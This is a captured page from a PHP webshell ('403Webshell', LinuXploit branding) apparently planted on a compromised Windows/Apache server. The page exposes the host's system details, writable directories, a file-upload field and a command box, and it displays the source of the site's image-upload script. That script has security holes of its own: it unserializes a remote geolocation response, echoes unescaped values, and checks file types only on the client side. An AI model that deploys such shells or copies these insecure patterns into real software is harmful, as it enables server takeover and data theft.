403Webshell
Server IP : 127.0.0.1  /  Your IP : 216.73.216.48
Web Server : Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
System : Windows NT DESKTOP-3H4FHQJ 10.0 build 19045 (Windows 10) AMD64
User : win 10 ( 0)
PHP Version : 8.2.12
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  D:/crane_image/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : D:/crane_image/upload.php

<html>

<?php 
session_start();
include('db_b.php'); 
//include('function.php');
?>

<div style="display:none;" >
 <?php
$user_ip = getenv('REMOTE_ADDR');
$geo = unserialize(file_get_contents("http://www.geoplugin.net/php.gp?ip=$user_ip"));
$city = $geo["geoplugin_city"];
$region = $geo["geoplugin_regionName"];
$country = $geo["geoplugin_countryName"];
/*echo"$user_ip";
echo "City: ".$city."<br>";
echo "Region: ".$region."<br>";
echo "Country: ".$country."<br>";
/*
geoplugin_request
geoplugin_status
geoplugin_credit
geoplugin_city
geoplugin_region
geoplugin_areaCode
geoplugin_dmaCode
geoplugin_countryCode
geoplugin_countryName
geoplugin_continentCode
geoplugin_latitude
geoplugin_longitude
geoplugin_regionCode
geoplugin_regionName
geoplugin_currencyCode
geoplugin_currencySymbol
geoplugin_currencySymbol_UTF8
geoplugin_currencyConverter
*/


?>
</div>

<head>

<title>Upload Image</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!--link rel="icon" href="kvt_con/khalaf_log.jpg" type="image/ico"-->
<link rel="stylesheet" type="text/css" href="main_css/upload.css" />

</head>

<body>
<?php

if(!isset($_SESSION['id'])){
		
echo"<script>window.open('login','_self')</script>";

}else{ $my_id = $_SESSION['id']; ?>

<input type="text" id="my_id" value="<?php echo"$my_id";?>" style="display:none;" />



<div class="create_blog_div">

<div class="login_acc_title" >Upload Image</div>

<div class="login_lebal" >Category</div>
<select id="category_option_output" class="sel_category"></select>

<div class="login_lebal" >Describe Actions</div>
<select id="describe_option_output" class="sel_category"></select>

<div class="login_lebal" >Photo</div>
<div id="" class="select_file_div">

<form method="post" enctype="multipart/form-data" >
<input type="file" id="image_input" onchange="get_file_name();"style="display:none;" />
</form>
<button onClick="document.getElementById('image_input').click();" class="select_file_btn" >Select Photo</button>

<div id="selected_file_name" class="selected_file_name" ></div>
</div>


<div id="new_blog_error_output" class="new_blog_error_output"></div>

<button id="imag_publish_btn1" onClickk="publish_image();"  class="blog_publish_btn" >Publish</button>
<button id="imag_publish_btn2" onClick="publish_image();"  class="blog_publish_btn" style="display:none;background:#2148FA;" >Publish</button>


<div id="display_output"></div>








</div><!--end of login_div-->








<script>


get_category_option();
function get_category_option()
{
	xmlhttp = new XMLHttpRequest();
   xmlhttp.open("get","auto_page.php?status=disp_category_option",false);
  xmlhttp.send(null);
  document.getElementById('category_option_output').innerHTML =xmlhttp.responseText;

		
}

//////////////////////////////////////////////////////////////////////////////

get_describe_action_option();
function get_describe_action_option()
{
	xmlhttp = new XMLHttpRequest();
   xmlhttp.open("get","auto_page.php?status=disp_describe_action_option",false);
  xmlhttp.send(null);
  document.getElementById('describe_option_output').innerHTML =xmlhttp.responseText;

}

/////////////////////////////////////////////////////////////////////////////////////////////

function get_file_name()
{
	//alert(44);
	curr_img = document.getElementById('image_input').files[0];
	image_name = curr_img.name;
	image_type = curr_img.type;



if(image_type !=="image/jpeg" && image_type !=="image/png")
{
document.getElementById('selected_file_name').innerHTML ="<span style='color:red;'>Image Formate not supported!</span>";
}else{
	document.getElementById('selected_file_name').innerHTML = image_type;
	document.getElementById('imag_publish_btn2').style.display="block";
	document.getElementById('imag_publish_btn1').style.display="none";
}
}

function publish_image()
{
	my_id = document.getElementById('my_id').value;
	//my_id =1;
	category_option = document.getElementById('category_option_output').value;
	describe_option = document.getElementById('describe_option_output').value;
	curr_image = document.getElementById('image_input').files[0];
	

	if(category_option =='Select Category'){alert('Select Category');}
	else if(describe_option =='Select Action'){alert('Select Action');}
	else if(curr_image =="undefined"){alert('Select Image');}else{
	
	var formdata = new FormData();
	formdata.append('image_input',curr_image);

     xmlhttp = new XMLHttpRequest();
	 
	 xmlhttp.addEventListener("load", completeHandler, false);
	 
     xmlhttp.open("POST","auto_page.php?my_id="+my_id+"&&category_option="+category_option+"&&describe_option="+describe_option+"&&status=insert_new_image",false);
     xmlhttp.send(formdata);
	 
     document.getElementById('new_blog_error_output').innerHTML =xmlhttp.responseText;
	 
	 function completeHandler(){
		 
		 alert("Image Uploaded");
	document.getElementById('imag_publish_btn2').style.display="none";
	document.getElementById('imag_publish_btn1').style.display="block";
	document.getElementById('category_option_output').value="Select Category";
	document.getElementById('describe_option_output').value="Select Action";
	document.getElementById('selected_file_name').innerHTML = "";
		 
		 }//alert(88);
	
	//alert(11);
	}
}




</script>

<?php } ?>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit